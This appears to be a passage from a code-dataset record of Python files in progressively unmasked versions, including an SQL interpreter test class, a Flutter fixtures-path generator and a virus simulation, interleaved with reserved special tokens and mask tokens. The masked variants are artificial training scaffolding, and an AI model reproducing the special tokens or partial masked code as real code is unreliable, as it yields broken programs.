"step-4": "class IOString:\n\n def __init__(self):\n self.str1 = ''\n\n def get_String(self):\n self.str1 = input()\n\n def print_String(self):\n print(self.str1.upper())\n\n\n<mask token>\nstr1.get_String()\nstr1.print_String()\n",
"step-5": "#Exercise 2 - Write a Python class which has two methods get_String and print_String. get_String accept a string\n#from the user and print_String print the string in upper case\n#string will be an input to a get_string method and whatever you put in will print when you make the print screen method\n\nclass IOString():\n def __init__(self):\n self.str1 = \"\"\n \n def get_String(self):\n self.str1 = input()\n \n def print_String(self):\n print(self.str1.upper())\n \nstr1 = IOString()\nstr1.get_String()\nstr1.print_String()",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
<|reserved_special_token_0|>
class InterpreterTest:
<|reserved_special_token_0|>
def tearDown(self):
self.interpreter.unload_all()
<|reserved_special_token_0|>
def test_select_2(self):
sql = """select
e.id, last_name, department_id, departments.id, name
from employees e, departments;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = 'select * from employees;'
self.interpreter.interpret(code)
self.cli.print_new_line()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpreterTest:
<|reserved_special_token_0|>
def tearDown(self):
self.interpreter.unload_all()
<|reserved_special_token_0|>
def test_select_2(self):
sql = """select
e.id, last_name, department_id, departments.id, name
from employees e, departments;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = 'select * from employees;'
self.interpreter.interpret(code)
self.cli.print_new_line()
def test_select_distinct(self):
sql = """select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;"""
self.cli.execute(sql)
self.cli.print_new_line()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpreterTest:
def setUp(self):
self.interpreter = SqlInterpreter()
self.cli = Cli(self.interpreter)
filename = os.path.join(os.path.dirname(__file__),
'resources/employees.csv')
self.interpreter.load(CsvTable('employees', filename))
filename = os.path.join(os.path.dirname(__file__),
'resources/departments.csv')
self.interpreter.load(CsvTable('departments', filename))
def tearDown(self):
self.interpreter.unload_all()
def test_select_1(self):
sql = """select
id, first_name || ' ' || last_name as full_name, salary - 1000
from employees;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_2(self):
sql = """select
e.id, last_name, department_id, departments.id, name
from employees e, departments;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = 'select * from employees;'
self.interpreter.interpret(code)
self.cli.print_new_line()
def test_select_distinct(self):
sql = """select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;"""
self.cli.execute(sql)
self.cli.print_new_line()
if __name__ == '__main__':
test = InterpreterTest()
test.setUp()
test.test_select_1()
test.test_select_2()
test.test_select_distinct()
test.tearDown()
<|reserved_special_token_1|>
import os
from sql_interpreter.tables.csv_table import CsvTable
from sql_interpreter.interpreter import SqlInterpreter
from sql_interpreter.cli import Cli
class InterpreterTest:
    """Smoke tests for SqlInterpreter against the bundled CSV fixtures."""

    def setUp(self):
        # Build a fresh interpreter/CLI pair and load the two sample tables
        # shipped under resources/ next to this file.
        self.interpreter = SqlInterpreter()
        self.cli = Cli(self.interpreter)
        filename = os.path.join(os.path.dirname(__file__),
            'resources/employees.csv')
        self.interpreter.load(CsvTable('employees', filename))
        filename = os.path.join(os.path.dirname(__file__),
            'resources/departments.csv')
        self.interpreter.load(CsvTable('departments', filename))

    def tearDown(self):
        # Drop every loaded table so repeated runs start from a clean slate.
        self.interpreter.unload_all()

    def test_select_1(self):
        """Projection with string concatenation, aliasing and arithmetic."""
        sql = """select
            id, first_name || ' ' || last_name as full_name, salary - 1000
            from employees;"""
        self.cli.execute(sql)
        self.cli.print_new_line()

    def test_select_2(self):
        """Cross join of two tables, mixing an alias with full table names."""
        sql = """select
            e.id, last_name, department_id, departments.id, name
            from employees e, departments;"""
        self.cli.execute(sql)
        self.cli.print_new_line()

    def test_select_all(self):
        """Star projection; goes through interpret() instead of the CLI."""
        code = 'select * from employees;'
        self.interpreter.interpret(code)
        self.cli.print_new_line()

    def test_select_distinct(self):
        """DISTINCT with column aliases and a two-key ORDER BY (asc + desc)."""
        sql = """select distinct
            departments.id as dep_id, employees.salary as sal
            from employees, departments
            order by dep_id, sal desc;"""
        self.cli.execute(sql)
        self.cli.print_new_line()
if __name__ == '__main__':
    # Ad-hoc runner: drives the suite manually instead of via unittest.
    # NOTE(review): test_select_all is defined but never invoked here —
    # confirm whether that omission is intentional.
    test = InterpreterTest()
    test.setUp()
    test.test_select_1()
    test.test_select_2()
    test.test_select_distinct()
    test.tearDown()
<|reserved_special_token_1|>
import os
from sql_interpreter.tables.csv_table import CsvTable
from sql_interpreter.interpreter import SqlInterpreter
from sql_interpreter.cli import Cli
class InterpreterTest():
    """Smoke tests for SqlInterpreter, driven through the Cli wrapper.

    NOTE(review): not a unittest.TestCase -- setUp/tearDown are called
    manually by the __main__ driver; confirm that is intentional.
    """

    def setUp(self):
        """Create the interpreter/CLI pair and load the two CSV fixture tables."""
        self.interpreter = SqlInterpreter()
        self.cli = Cli(self.interpreter)
        filename = os.path.join(
            os.path.dirname(__file__), 'resources/employees.csv')
        self.interpreter.load(CsvTable('employees', filename))
        filename = os.path.join(
            os.path.dirname(__file__), 'resources/departments.csv')
        self.interpreter.load(CsvTable('departments', filename))

    def tearDown(self):
        """Unload every table loaded during setUp."""
        self.interpreter.unload_all()

    def test_select_1(self):
        """Projection with string concatenation (||), an alias and arithmetic."""
        sql = '''select
id, first_name || ' ' || last_name as full_name, salary - 1000
from employees;'''
        self.cli.execute(sql)
        self.cli.print_new_line()

    def test_select_2(self):
        """Cross join mixing aliased (e.id) and qualified (departments.id) columns."""
        sql = '''select
e.id, last_name, department_id, departments.id, name
from employees e, departments;'''
        self.cli.execute(sql)
        self.cli.print_new_line()

    def test_select_all(self):
        """SELECT * fed directly to the interpreter instead of cli.execute."""
        code = '''select * from employees;'''
        self.interpreter.interpret(code)
        self.cli.print_new_line()

    def test_select_distinct(self):
        """DISTINCT over a cross join, ordered by both output aliases."""
        sql = '''select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;'''
        self.cli.execute(sql)
        self.cli.print_new_line()
if __name__ == '__main__':
    # Manual driver: lifecycle is run explicitly since this is not a
    # unittest.TestCase collected by a test runner.
    test = InterpreterTest()
    test.setUp()
    test.test_select_1()
    test.test_select_2()
    # NOTE(review): test_select_all is never invoked here -- confirm intentional.
    test.test_select_distinct()
    test.tearDown()
|
flexible
|
{
"blob_id": "b3ee76bc0d93135d0908044a2424dd927a390007",
"index": 6357,
"step-1": "<mask token>\n\n\nclass InterpreterTest:\n <mask token>\n\n def tearDown(self):\n self.interpreter.unload_all()\n <mask token>\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass InterpreterTest:\n <mask token>\n\n def tearDown(self):\n self.interpreter.unload_all()\n <mask token>\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n\n def test_select_distinct(self):\n sql = \"\"\"select distinct\n departments.id as dep_id, employees.salary as sal\n from employees, departments\n order by dep_id, sal desc;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass InterpreterTest:\n\n def setUp(self):\n self.interpreter = SqlInterpreter()\n self.cli = Cli(self.interpreter)\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/employees.csv')\n self.interpreter.load(CsvTable('employees', filename))\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/departments.csv')\n self.interpreter.load(CsvTable('departments', filename))\n\n def tearDown(self):\n self.interpreter.unload_all()\n\n def test_select_1(self):\n sql = \"\"\"select\n id, first_name || ' ' || last_name as full_name, salary - 1000\n from employees;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n\n def test_select_distinct(self):\n sql = \"\"\"select distinct\n departments.id as dep_id, employees.salary as sal\n from employees, departments\n order by dep_id, sal desc;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n\nif __name__ == '__main__':\n test = InterpreterTest()\n test.setUp()\n test.test_select_1()\n test.test_select_2()\n test.test_select_distinct()\n test.tearDown()\n",
"step-4": "import os\nfrom sql_interpreter.tables.csv_table import CsvTable\nfrom sql_interpreter.interpreter import SqlInterpreter\nfrom sql_interpreter.cli import Cli\n\n\nclass InterpreterTest:\n\n def setUp(self):\n self.interpreter = SqlInterpreter()\n self.cli = Cli(self.interpreter)\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/employees.csv')\n self.interpreter.load(CsvTable('employees', filename))\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/departments.csv')\n self.interpreter.load(CsvTable('departments', filename))\n\n def tearDown(self):\n self.interpreter.unload_all()\n\n def test_select_1(self):\n sql = \"\"\"select\n id, first_name || ' ' || last_name as full_name, salary - 1000\n from employees;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n\n def test_select_distinct(self):\n sql = \"\"\"select distinct\n departments.id as dep_id, employees.salary as sal\n from employees, departments\n order by dep_id, sal desc;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n\nif __name__ == '__main__':\n test = InterpreterTest()\n test.setUp()\n test.test_select_1()\n test.test_select_2()\n test.test_select_distinct()\n test.tearDown()\n",
"step-5": "import os\r\nfrom sql_interpreter.tables.csv_table import CsvTable\r\nfrom sql_interpreter.interpreter import SqlInterpreter\r\nfrom sql_interpreter.cli import Cli\r\n\r\n\r\nclass InterpreterTest():\r\n def setUp(self):\r\n self.interpreter = SqlInterpreter()\r\n self.cli = Cli(self.interpreter)\r\n filename = os.path.join(\r\n os.path.dirname(__file__), 'resources/employees.csv')\r\n self.interpreter.load(CsvTable('employees', filename))\r\n filename = os.path.join(\r\n os.path.dirname(__file__), 'resources/departments.csv')\r\n self.interpreter.load(CsvTable('departments', filename))\r\n\r\n def tearDown(self):\r\n self.interpreter.unload_all()\r\n\r\n def test_select_1(self):\r\n sql = '''select\r\n id, first_name || ' ' || last_name as full_name, salary - 1000\r\n from employees;'''\r\n self.cli.execute(sql)\r\n self.cli.print_new_line()\r\n\r\n def test_select_2(self):\r\n sql = '''select\r\n e.id, last_name, department_id, departments.id, name\r\n from employees e, departments;'''\r\n self.cli.execute(sql)\r\n self.cli.print_new_line()\r\n\r\n def test_select_all(self):\r\n code = '''select * from employees;'''\r\n self.interpreter.interpret(code)\r\n self.cli.print_new_line()\r\n\r\n def test_select_distinct(self):\r\n sql = '''select distinct\r\n departments.id as dep_id, employees.salary as sal\r\n from employees, departments\r\n order by dep_id, sal desc;'''\r\n self.cli.execute(sql)\r\n self.cli.print_new_line()\r\n\r\n\r\nif __name__ == '__main__':\r\n test = InterpreterTest()\r\n test.setUp()\r\n test.test_select_1()\r\n test.test_select_2()\r\n test.test_select_distinct()\r\n test.tearDown()\r\n",
"step-ids": [
4,
5,
8,
9,
10
]
}
|
[
4,
5,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for x in range(11, m):
S = S + x
print('sum =', S)
<|reserved_special_token_1|>
# Sum of the series 11 + 12 + ... + m: seed S with m itself, then add
# the remainder of the range in one shot instead of an explicit loop.
m = int(input('请输入一个数:'))
S = m + sum(range(11, m))
print('sum =', S)
<|reserved_special_token_1|>
# Compute 11 + 12 + 13 + ... + m for a user-supplied m.
# S starts at m itself; the loop then adds 11 .. m-1, completing the series.
# NOTE(review): assumes m >= 11 -- smaller inputs just print m; confirm.
m = int(input('请输入一个数:'))
S = m
for x in range(11,m):
    S = S+x
print('sum =',S)
|
flexible
|
{
"blob_id": "49ffa225d433ef2263159ba2145da5ba2a95d1f2",
"index": 4664,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor x in range(11, m):\n S = S + x\nprint('sum =', S)\n",
"step-3": "m = int(input('请输入一个数:'))\nS = m\nfor x in range(11, m):\n S = S + x\nprint('sum =', S)\n",
"step-4": "#求11+12+13+。。。+m\nm = int(input('请输入一个数:'))\nS = m\nfor x in range(11,m):\n S = S+x\nprint('sum =',S)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Launcher for the Duisburg RIS web app.
import os
# CITY_CONF must be set before importing webapp, which presumably reads it
# at import time -- TODO confirm against webapp's config loading.
os.environ['CITY_CONF'] = '/opt/ris-web/city/duisburg.py'
from webapp import app
# NOTE(review): debug=True combined with host 0.0.0.0 exposes the debugger
# to the network -- confirm this launcher is development-only.
app.run(debug=True, host='0.0.0.0')
|
normal
|
{
"blob_id": "4276fd61ad48b325961cd45be68eea6eab51f916",
"index": 6085,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp.run(debug=True, host='0.0.0.0')\n",
"step-3": "<mask token>\nos.environ['CITY_CONF'] = '/opt/ris-web/city/duisburg.py'\n<mask token>\napp.run(debug=True, host='0.0.0.0')\n",
"step-4": "import os\nos.environ['CITY_CONF'] = '/opt/ris-web/city/duisburg.py'\nfrom webapp import app\napp.run(debug=True, host='0.0.0.0')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ComplexCustom(complex):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ComplexCustom(complex):
<|reserved_special_token_0|>
def __format__(self, fmt):
"""This function creates a custom made format for printing complex numbers"""
cfmt = '({:' + fmt + '}{:+' + fmt + '}j)'
return cfmt.format(self.real, self.imag)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ComplexCustom(complex):
    """complex subclass whose __format__ renders '(real+imagj)', applying
    the caller's format spec to both components."""

    def __format__(self, fmt):
        """Apply *fmt* to both parts; the imaginary part always carries its sign."""
        return f'({self.real:{fmt}}{self.imag:+{fmt}}j)'
<|reserved_special_token_1|>
'''Module defining ComplexCustom, a complex subclass with a custom __format__.'''


class ComplexCustom(complex):
    '''
    complex subclass that formats as "(real+imagj)", applying the caller's
    format spec to both the real and the imaginary component.
    '''

    def __format__(self, fmt):
        '''Apply *fmt* to both parts; the imaginary part always carries a sign.

        E.g. format(ComplexCustom(3+4.5j), '.1f') -> '(3.0+4.5j)'.
        '''
        # Build "({:<fmt>}{:+<fmt>}j)"; the '+' forces an explicit sign on
        # the imaginary part so the output reads like Python's complex repr.
        cfmt = "({:" + fmt + "}{:+" + fmt + "}j)"
        return cfmt.format(self.real, self.imag)
|
flexible
|
{
"blob_id": "c62647b0b226d97926d1f53975a7aac7c39949d8",
"index": 7959,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ComplexCustom(complex):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ComplexCustom(complex):\n <mask token>\n\n def __format__(self, fmt):\n \"\"\"This function creates a custom made format for printing complex numbers\"\"\"\n cfmt = '({:' + fmt + '}{:+' + fmt + '}j)'\n return cfmt.format(self.real, self.imag)\n",
"step-4": "<mask token>\n\n\nclass ComplexCustom(complex):\n \"\"\"\n This class contains function for\n a custom made printing format for complex numbers\n \"\"\"\n\n def __format__(self, fmt):\n \"\"\"This function creates a custom made format for printing complex numbers\"\"\"\n cfmt = '({:' + fmt + '}{:+' + fmt + '}j)'\n return cfmt.format(self.real, self.imag)\n",
"step-5": "'''This class contains a custom made format for printing complex numbers'''\nclass ComplexCustom(complex):\n '''\n This class contains function for\n a custom made printing format for complex numbers\n '''\n def __format__(self, fmt):\n '''This function creates a custom made format for printing complex numbers'''\n cfmt = \"({:\" + fmt + \"}{:+\" + fmt + \"}j)\"\n return cfmt.format(self.real, self.imag)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(description=
'Create the symbol specifying the location of test fixtures.')
parser.add_argument('--fixtures_location_file', type=str, required=True)
parser.add_argument('--fixtures_location', type=str, required=True)
args = parser.parse_args()
with open(args.fixtures_location_file, 'w') as file:
file.write(
'namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
% args.fixtures_location)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(description=
'Create the symbol specifying the location of test fixtures.')
parser.add_argument('--fixtures_location_file', type=str, required=True)
parser.add_argument('--fixtures_location', type=str, required=True)
args = parser.parse_args()
with open(args.fixtures_location_file, 'w') as file:
file.write(
'namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
% args.fixtures_location)
if __name__ == '__main__':
sys.exit(main())
<|reserved_special_token_1|>
import argparse
import subprocess
import sys
import os
def main():
    """Parse the two required flags and write a one-line C++ translation unit
    exposing GetFixturesPath() that returns the fixtures directory."""
    arg_parser = argparse.ArgumentParser(
        description='Create the symbol specifying the location of test fixtures.')
    for flag in ('--fixtures_location_file', '--fixtures_location'):
        arg_parser.add_argument(flag, type=str, required=True)
    opts = arg_parser.parse_args()

    source = ('namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
              % opts.fixtures_location)
    with open(opts.fixtures_location_file, 'w') as out:
        out.write(source)


if __name__ == '__main__':
    sys.exit(main())
<|reserved_special_token_1|>
#!/usr/bin/env python
# Copyright 2013 The Flutter Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import subprocess
import sys
import os
def main():
    """Generate a C++ source snippet exposing GetFixturesPath().

    Reads --fixtures_location_file (output path) and --fixtures_location
    (directory string to embed) and writes a single-line namespace
    definition returning that path.
    """
    parser = argparse.ArgumentParser(
        description='Create the symbol specifying the location of test fixtures.')

    parser.add_argument('--fixtures_location_file', type=str, required=True)
    parser.add_argument('--fixtures_location', type=str, required=True)

    args = parser.parse_args()

    # NOTE(review): %s is substituted verbatim -- assumes the path contains
    # no characters needing C string escaping (quotes, backslashes); confirm.
    with open(args.fixtures_location_file, 'w') as file:
        file.write('namespace flutter {namespace testing {const char* GetFixturesPath() {return "%s";}}}'
            % args.fixtures_location)


if __name__ == '__main__':
    sys.exit(main())
|
flexible
|
{
"blob_id": "d5c6582547df540ffc9c73d10a3405ec97487bba",
"index": 4513,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\n 'Create the symbol specifying the location of test fixtures.')\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n args = parser.parse_args()\n with open(args.fixtures_location_file, 'w') as file:\n file.write(\n 'namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\n 'Create the symbol specifying the location of test fixtures.')\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n args = parser.parse_args()\n with open(args.fixtures_location_file, 'w') as file:\n file.write(\n 'namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n",
"step-4": "import argparse\nimport subprocess\nimport sys\nimport os\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\n 'Create the symbol specifying the location of test fixtures.')\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n args = parser.parse_args()\n with open(args.fixtures_location_file, 'w') as file:\n file.write(\n 'namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n",
"step-5": "#!/usr/bin/env python\n# Copyright 2013 The Flutter Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport argparse\nimport subprocess\nimport sys\nimport os\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Create the symbol specifying the location of test fixtures.')\n\n parser.add_argument('--fixtures_location_file', type=str, required=True)\n parser.add_argument('--fixtures_location', type=str, required=True)\n\n args = parser.parse_args()\n\n with open(args.fixtures_location_file, 'w') as file:\n file.write('namespace flutter {namespace testing {const char* GetFixturesPath() {return \"%s\";}}}'\n % args.fixtures_location)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from mtots.parser import base
from mtots.parser import combinator
from mtots.parser.combinator import All
from mtots.parser.combinator import Any
from mtots.parser.combinator import AnyTokenBut
from mtots.parser.combinator import Forward
from mtots.parser.combinator import Peek
from mtots.parser.combinator import Required
from mtots.parser.combinator import Token
|
normal
|
{
"blob_id": "f9edbef46494cc2993c6a633fe35406524dbbf67",
"index": 1199,
"step-1": "<mask token>\n",
"step-2": "from mtots.parser import base\nfrom mtots.parser import combinator\nfrom mtots.parser.combinator import All\nfrom mtots.parser.combinator import Any\nfrom mtots.parser.combinator import AnyTokenBut\nfrom mtots.parser.combinator import Forward\nfrom mtots.parser.combinator import Peek\nfrom mtots.parser.combinator import Required\nfrom mtots.parser.combinator import Token\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
class Virus:
def __init__(self, _name, _age, _malignancy):
self.name = _name
self.age = _age
self.malignancy = _malignancy
def set_name(self, _name):
self.name = _name
def set_age(self, _age):
self.age = _age
<|reserved_special_token_0|>
def update(self):
self.age += 1
if self.age % 3 == 0:
self.malignancy += 1
if self.malignancy < 0:
self.malignancy = 0
if self.malignancy > 99:
self.malignancy = 99
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Virus:
def __init__(self, _name, _age, _malignancy):
self.name = _name
self.age = _age
self.malignancy = _malignancy
def set_name(self, _name):
self.name = _name
def set_age(self, _age):
self.age = _age
<|reserved_special_token_0|>
def update(self):
self.age += 1
if self.age % 3 == 0:
self.malignancy += 1
if self.malignancy < 0:
self.malignancy = 0
if self.malignancy > 99:
self.malignancy = 99
def __str__(self):
return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,
str(self.age), str(self.malignancy))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Virus:
    """Simulation entity: a virus ages daily and grows more malignant every
    third day; malignancy is kept clamped to the range [0, 99] by update()."""

    def __init__(self, _name, _age, _malignancy):
        self.name = _name
        self.age = _age
        self.malignancy = _malignancy

    def set_name(self, _name):
        """Setter for the name."""
        self.name = _name

    def set_age(self, _age):
        """Setter for the age in days."""
        self.age = _age

    def set_malignancy(self, _malignancy):
        """Setter for the malignancy level."""
        self.malignancy = _malignancy

    def update(self):
        """Advance one day; every third day malignancy rises, then re-clamp."""
        self.age += 1
        if self.age % 3 == 0:
            self.malignancy += 1
        # Equivalent to the pair of boundary checks: pin into [0, 99].
        self.malignancy = max(0, min(self.malignancy, 99))

    def __str__(self):
        """Indonesian-language one-line status report."""
        return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(
            self.name, str(self.age), str(self.malignancy))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Virus:
    """A virus tracked by name, age in days, and malignancy level.

    update() advances one day; malignancy grows every third day and is
    clamped to [0, 99] afterwards.
    """

    def __init__(self, _name, _age, _malignancy):
        # NOTE(review): the constructor does not clamp malignancy to
        # [0, 99]; only update() does -- confirm whether intentional.
        self.name = _name
        self.age = _age
        self.malignancy = _malignancy

    def set_name(self, _name):
        """Replace the virus name."""
        self.name = _name

    def set_age(self, _age):
        """Replace the age (in days)."""
        self.age = _age

    def set_malignancy(self, _malignancy):
        """Replace the malignancy level (not clamped here)."""
        self.malignancy = _malignancy

    def update(self):
        """Advance one day; raise malignancy every third day, clamp to [0, 99]."""
        self.age += 1
        if self.age % 3 == 0:
            self.malignancy += 1
        if self.malignancy < 0:
            self.malignancy = 0
        if self.malignancy > 99:
            self.malignancy = 99

    def __str__(self):
        """Indonesian-language one-line report: name, age, malignancy."""
        return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,
            str(self.age), str(self.malignancy))
if __name__ == '__main__':
    # First stdin line: "<virus count> <day count>".
    tmp = input().split()
    number_of_virus = int(tmp[0])
    number_of_day = int(tmp[1])
    viruses = []
    # One stdin line per virus: "<name> <age> <malignancy>".
    for index_of_virus in range(0, number_of_virus):
        tmp = input().split()
        virus_name = tmp[0]
        virus_age = int(tmp[1])
        virus_malignancy = int(tmp[2])
        tmp_virus = Virus(virus_name, virus_age, virus_malignancy)
        viruses.append(tmp_virus)
    # Simulate day by day, printing each virus after its daily update.
    for day in range(1, number_of_day + 1):
        print('Hari #{}'.format(str(day)))
        for index_of_virus in range(0, len(viruses)):
            viruses[index_of_virus].update()
            print(viruses[index_of_virus])
<|reserved_special_token_1|>
class Virus:
    """A named virus whose malignancy level (0-99) ticks upward on every
    third day of its age; see update() for the daily step."""

    def __init__(self, _name, _age, _malignancy):
        self.name = _name
        self.age = _age
        self.malignancy = _malignancy

    def set_name(self, _name):
        """Overwrite the name."""
        self.name = _name

    def set_age(self, _age):
        """Overwrite the age."""
        self.age = _age

    def set_malignancy(self, _malignancy):
        """Overwrite the malignancy level."""
        self.malignancy = _malignancy

    def update(self):
        """One simulated day: age grows, malignancy rises on multiples of
        three, and the level is pinned back into the 0..99 band."""
        self.age += 1
        if self.age % 3 == 0:
            self.malignancy += 1
        if self.malignancy < 0:
            self.malignancy = 0
        elif self.malignancy > 99:
            self.malignancy = 99

    def __str__(self):
        """Render the Indonesian status line used by the stdin driver."""
        return "Nama: {}; Usia: {}; Tingkat Keganasan: {}".format(
            self.name, str(self.age), str(self.malignancy))
if __name__ == "__main__":
    # Header line from stdin: virus count, then number of simulation days.
    header = input().split()
    virus_count = int(header[0])
    day_count = int(header[1])

    # One line per virus: "<name> <age> <malignancy>".
    viruses = []
    for _ in range(virus_count):
        fields = input().split()
        viruses.append(Virus(fields[0], int(fields[1]), int(fields[2])))

    # Run the simulation, printing every virus after its daily update.
    for day in range(1, day_count + 1):
        print("Hari #{}".format(str(day)))
        for virus in viruses:
            virus.update()
            print(virus)
|
flexible
|
{
"blob_id": "49c3c3b8c4b097f520456736e31ac306a9f73ac7",
"index": 3544,
"step-1": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n <mask token>\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n <mask token>\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n\n def __str__(self):\n return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,\n str(self.age), str(self.malignancy))\n\n\n<mask token>\n",
"step-3": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n\n def set_malignancy(self, _malignancy):\n self.malignancy = _malignancy\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n\n def __str__(self):\n return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,\n str(self.age), str(self.malignancy))\n\n\n<mask token>\n",
